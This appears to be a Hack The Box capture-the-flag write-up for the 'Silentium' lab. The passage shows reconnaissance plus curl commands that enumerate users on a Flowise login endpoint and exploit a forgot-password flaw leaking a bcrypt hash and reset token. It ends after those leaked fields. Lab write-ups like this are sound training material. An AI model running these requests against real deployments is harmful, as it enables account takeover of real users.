Linux

Hack The Box - Season 10 HTB Silentium Writeup - Easy- Weekly - April 12th, 2026

1337 Sheets
1337 Sheets
·
Hack The Box - Season 10 HTB Silentium Writeup - Easy- Weekly - April 12th, 2026

Summary

Silentium is an Easy Linux box hosting a corporate finance website and a staging Flowise AI platform behind a virtual host. The attack chain exploits three vulnerabilities.

Reconnaissance

Nmap Scan

nmap -sC -sV -p 22,80 <TARGET_IP>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Silentium | Institutional Capital & Lending Solutions

Two ports open: SSH and HTTP. Port 80 serves an nginx web server that redirects to silentium.htb.

Virtual Host Discovery

ffuf -u http://silentium.htb -H "Host: FUZZ.silentium.htb" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac

Discovered staging.silentium.htb (Status 200).

Added both hostnames to /etc/hosts:

<TARGET_IP> silentium.htb staging.silentium.htb

Enumeration

silentium.htb - Main Site

A static corporate website for "Silentium International Asset Management", an institutional finance firm. The team section lists:

  • Marcus Thorne - Managing Director
  • Ben - Head of Financial Systems
  • Elena Rossi - Chief Risk Officer

The name "Ben" with only a first name is notable as a potential username.

staging.silentium.htb - Flowise 3.0.5

The staging subdomain runs Flowise 3.0.5, an open-source AI agent builder platform.

curl -s http://staging.silentium.htb/api/v1/version
# {"version":"3.0.5"}

Most API endpoints return {"error":"Unauthorized Access"}, confirming authentication is enabled.

User Enumeration

The Flowise login endpoint leaks whether a user exists via different error messages:

# Non-existent user returns 404
curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"admin@silentium.htb","password":"test"}'
# {"statusCode":404,"message":"User Not Found"}

# Valid user returns 401
curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"ben@silentium.htb","password":"test"}'
# {"statusCode":401,"message":"Incorrect Email or Password"}

Confirmed valid user: ben@silentium.htb

Initial Access

Step 1: GHSA-jc5m-wrp2-qq38 - PII Disclosure on Forgot Password

Vulnerability: Flowise <= 3.0.12 exposes sensitive user data (bcrypt password hash and password reset token) in the response of the unauthenticated forgot-password endpoint.

curl -s -X POST "http://staging.silentium.htb/api/v1/account/forgot-password" \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'

Response (key fields):

{
  "user": {
    "id": "<REDACTED_UUID>",
    "name": "admin",
    "email": "ben@silentium.htb",
    "credential": "<REDACTED_BCRYPT_HASH>",
    "tempToken": "<REDACTED_TOKEN>",
    "tokenExpiry": "<REDACTED_TIMESTAMP>",
    "status": "active"
  }
}

Leaked data:

  • credential - bcrypt password hash (cost factor 5)
  • tempToken - password reset token (valid for 15 minutes)